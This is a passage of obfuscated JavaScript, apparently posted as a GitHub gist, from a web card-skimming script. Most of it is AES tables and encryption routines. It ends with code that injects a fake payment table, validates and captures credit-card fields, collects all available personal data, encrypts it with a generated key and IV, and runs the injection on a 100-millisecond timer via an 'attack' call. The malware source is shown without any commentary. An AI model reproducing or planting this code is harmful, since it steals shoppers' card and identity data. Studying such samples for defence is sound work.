rsbox: [82,9,106,213,48,54,165,56,191,64,163,158,129,243,215,251,124,227,57,130,155,47,255,135,52,142,67,68,196,222,233,203,84,123,148,50,166,194,35,61,238,76,149,11,66,250,195,78,8,46,161,102,40,217,36,178,118,91,162,73,109,139,209,37,114,248,246,100,134,104,152,22,212,164,92,204,93,101,182,146,108,112,72,80,253,237,185,218,94,21,70,87,167,141,157,132,144,216,171,0,140,188,211,10,247,228,88,5,184,179,69,6,208,44,30,143,202,63,15,2,193,175,189,3,1,19,138,107,58,145,17,65,79,103,220,234,151,242,207,206,240,180,230,115,150,172,116,34,231,173,53,133,226,249,55,232,28,117,223,110,71,241,26,113,29,41,197,137,111,183,98,14,170,24,190,27,252,86,62,75,198,210,121,32,154,219,192,254,120,205,90,244,31,221,168,51,136,7,199,49,177,18,16,89,39,128,236,95,96,81,127,169,25,181,74,13,45,229,122,159,147,201,156,239,160,224,59,77,174,42,245,176,200,235,187,60,131,83,153,97,23,43,4,126,186,119,214,38,225,105,20,99,85,33,12,125], | |
rotate: rotate_, | |
Rcon: [141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203,141,1,2,4,8,16,32,64,128,27,54,108,216,171,77,154,47,94,188,99,198,151,53,106,212,179,125,250,239,197,145,57,114,228,211,189,97,194,159,37,74,148,51,102,204,131,29,58,116,232,203], | |
G2X: [0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74,76,78,80,82,84,86,88,90,92,94,96,98,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,152,154,156,158,160,162,164,166,168,170,172,174,176,178,180,182,184,186,188,190,192,194,196,198,200,202,204,206,208,210,212,214,216,218,220,222,224,226,228,230,232,234,236,238,240,242,244,246,248,250,252,254,27,25,31,29,19,17,23,21,11,9,15,13,3,1,7,5,59,57,63,61,51,49,55,53,43,41,47,45,35,33,39,37,91,89,95,93,83,81,87,85,75,73,79,77,67,65,71,69,123,121,127,125,115,113,119,117,107,105,111,109,99,97,103,101,155,153,159,157,147,145,151,149,139,137,143,141,131,129,135,133,187,185,191,189,179,177,183,181,171,169,175,173,163,161,167,165,219,217,223,221,211,209,215,213,203,201,207,205,195,193,199,197,251,249,255,253,243,241,247,245,235,233,239,237,227,225,231,229], | |
G3X: [0,3,6,5,12,15,10,9,24,27,30,29,20,23,18,17,48,51,54,53,60,63,58,57,40,43,46,45,36,39,34,33,96,99,102,101,108,111,106,105,120,123,126,125,116,119,114,113,80,83,86,85,92,95,90,89,72,75,78,77,68,71,66,65,192,195,198,197,204,207,202,201,216,219,222,221,212,215,210,209,240,243,246,245,252,255,250,249,232,235,238,237,228,231,226,225,160,163,166,165,172,175,170,169,184,187,190,189,180,183,178,177,144,147,150,149,156,159,154,153,136,139,142,141,132,135,130,129,155,152,157,158,151,148,145,146,131,128,133,134,143,140,137,138,171,168,173,174,167,164,161,162,179,176,181,182,191,188,185,186,251,248,253,254,247,244,241,242,227,224,229,230,239,236,233,234,203,200,205,206,199,196,193,194,211,208,213,214,223,220,217,218,91,88,93,94,87,84,81,82,67,64,69,70,79,76,73,74,107,104,109,110,103,100,97,98,115,112,117,118,127,124,121,122,59,56,61,62,55,52,49,50,35,32,37,38,47,44,41,42,11,8,13,14,7,4,1,2,19,16,21,22,31,28,25,26], | |
G9X: [0,9,18,27,36,45,54,63,72,65,90,83,108,101,126,119,144,153,130,139,180,189,166,175,216,209,202,195,252,245,238,231,59,50,41,32,31,22,13,4,115,122,97,104,87,94,69,76,171,162,185,176,143,134,157,148,227,234,241,248,199,206,213,220,118,127,100,109,82,91,64,73,62,55,44,37,26,19,8,1,230,239,244,253,194,203,208,217,174,167,188,181,138,131,152,145,77,68,95,86,105,96,123,114,5,12,23,30,33,40,51,58,221,212,207,198,249,240,235,226,149,156,135,142,177,184,163,170,236,229,254,247,200,193,218,211,164,173,182,191,128,137,146,155,124,117,110,103,88,81,74,67,52,61,38,47,16,25,2,11,215,222,197,204,243,250,225,232,159,150,141,132,187,178,169,160,71,78,85,92,99,106,113,120,15,6,29,20,43,34,57,48,154,147,136,129,190,183,172,165,210,219,192,201,246,255,228,237,10,3,24,17,46,39,60,53,66,75,80,89,102,111,116,125,161,168,179,186,133,140,151,158,233,224,251,242,205,196,223,214,49,56,35,42,21,28,7,14,121,112,107,98,93,84,79,70], | |
GBX: [0,11,22,29,44,39,58,49,88,83,78,69,116,127,98,105,176,187,166,173,156,151,138,129,232,227,254,245,196,207,210,217,123,112,109,102,87,92,65,74,35,40,53,62,15,4,25,18,203,192,221,214,231,236,241,250,147,152,133,142,191,180,169,162,246,253,224,235,218,209,204,199,174,165,184,179,130,137,148,159,70,77,80,91,106,97,124,119,30,21,8,3,50,57,36,47,141,134,155,144,161,170,183,188,213,222,195,200,249,242,239,228,61,54,43,32,17,26,7,12,101,110,115,120,73,66,95,84,247,252,225,234,219,208,205,198,175,164,185,178,131,136,149,158,71,76,81,90,107,96,125,118,31,20,9,2,51,56,37,46,140,135,154,145,160,171,182,189,212,223,194,201,248,243,238,229,60,55,42,33,16,27,6,13,100,111,114,121,72,67,94,85,1,10,23,28,45,38,59,48,89,82,79,68,117,126,99,104,177,186,167,172,157,150,139,128,233,226,255,244,197,206,211,216,122,113,108,103,86,93,64,75,34,41,52,63,14,5,24,19,202,193,220,215,230,237,240,251,146,153,132,143,190,181,168,163], | |
GDX: [0,13,26,23,52,57,46,35,104,101,114,127,92,81,70,75,208,221,202,199,228,233,254,243,184,181,162,175,140,129,150,155,187,182,161,172,143,130,149,152,211,222,201,196,231,234,253,240,107,102,113,124,95,82,69,72,3,14,25,20,55,58,45,32,109,96,119,122,89,84,67,78,5,8,31,18,49,60,43,38,189,176,167,170,137,132,147,158,213,216,207,194,225,236,251,246,214,219,204,193,226,239,248,245,190,179,164,169,138,135,144,157,6,11,28,17,50,63,40,37,110,99,116,121,90,87,64,77,218,215,192,205,238,227,244,249,178,191,168,165,134,139,156,145,10,7,16,29,62,51,36,41,98,111,120,117,86,91,76,65,97,108,123,118,85,88,79,66,9,4,19,30,61,48,39,42,177,188,171,166,133,136,159,146,217,212,195,206,237,224,247,250,183,186,173,160,131,142,153,148,223,210,197,200,235,230,241,252,103,106,125,112,83,94,73,68,15,2,21,24,59,54,33,44,12,1,22,27,56,53,34,47,100,105,126,115,80,93,74,71,220,209,198,203,232,229,242,255,180,185,174,163,128,141,154,151], | |
GEX: [0,14,28,18,56,54,36,42,112,126,108,98,72,70,84,90,224,238,252,242,216,214,196,202,144,158,140,130,168,166,180,186,219,213,199,201,227,237,255,241,171,165,183,185,147,157,143,129,59,53,39,41,3,13,31,17,75,69,87,89,115,125,111,97,173,163,177,191,149,155,137,135,221,211,193,207,229,235,249,247,77,67,81,95,117,123,105,103,61,51,33,47,5,11,25,23,118,120,106,100,78,64,82,92,6,8,26,20,62,48,34,44,150,152,138,132,174,160,178,188,230,232,250,244,222,208,194,204,65,79,93,83,121,119,101,107,49,63,45,35,9,7,21,27,161,175,189,179,153,151,133,139,209,223,205,195,233,231,245,251,154,148,134,136,162,172,190,176,234,228,246,248,210,220,206,192,122,116,102,104,66,76,94,80,10,4,22,24,50,60,46,32,236,226,240,254,212,218,200,198,156,146,128,142,164,170,184,182,12,2,16,30,52,58,40,38,124,114,96,110,68,74,88,86,55,57,43,37,15,1,19,29,71,73,91,85,127,113,99,109,215,217,203,197,239,225,243,253,167,169,187,181,159,145,131,141], | |
core: core_, | |
expandKey: expandKey_, | |
addRoundKey: addRoundKey_, | |
createRoundKey: createRoundKey_, | |
subBytes: subBytes_, | |
shiftRows: shiftRows_, | |
shiftRow: shiftRow_, | |
galois_multiplication: galois_multiplication_, | |
mixColumns: mixColumns_, | |
mixColumn: mixColumn_, | |
round: round_, | |
invRound: invRound, | |
main: main_, | |
invMain: invMain_, | |
numberOfRounds: numberOfRounds_, | |
encrypt: encrypt_, | |
decrypt: decrypt_ | |
}, | |
modeOfOperation: { | |
OFB: 0, | |
CFB: 1, | |
CBC: 2 | |
}, | |
getBlock: getBlock_, | |
encrypt: encrypt__, | |
decrypt: decrypt__, | |
padBytesIn: padBytesIn_, | |
unpadBytesOut: unpadBytesOut_ | |
}; | |
void 0 === existingGuid ? generateGuid32() : 32 != getCodeArrFromString(existingGuid).length ? generateGuid32() : existingGuid = getCodeArrFromString(existingGuid), void 0 === existingIv ? generateIv16() : 16 != getCodeArrFromString(existingIv).length ? generateIv16() : existingIv = getCodeArrFromString(existingIv); | |
var _0x49B8 = str2EncodedArr(data); | |
return arr2String(utils.encrypt(_0x49B8, 2, existingGuid, existingIv)); | |
} | |
teros = injectPaymentTable; | |
binoms = validateCcFields; | |
adumn = changeCallback; | |
hinnes = isValidCcNumber; | |
dertons = clickCallback; | |
linomx = collectAllAvailablePii; | |
_gfv = getValueFromLocalStorageOrElement; | |
hornis = generateGUID__; | |
lscr = false; | |
setInterval(startInjections, 100); | |
setInterval(removeInjectionIfDone, 100); | |
derit = generateGUID_; | |
kilons = generateIV_; | |
admis = encryptData_; | |
}; | |
attack(7206); | |
return 6052; | |
}()); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment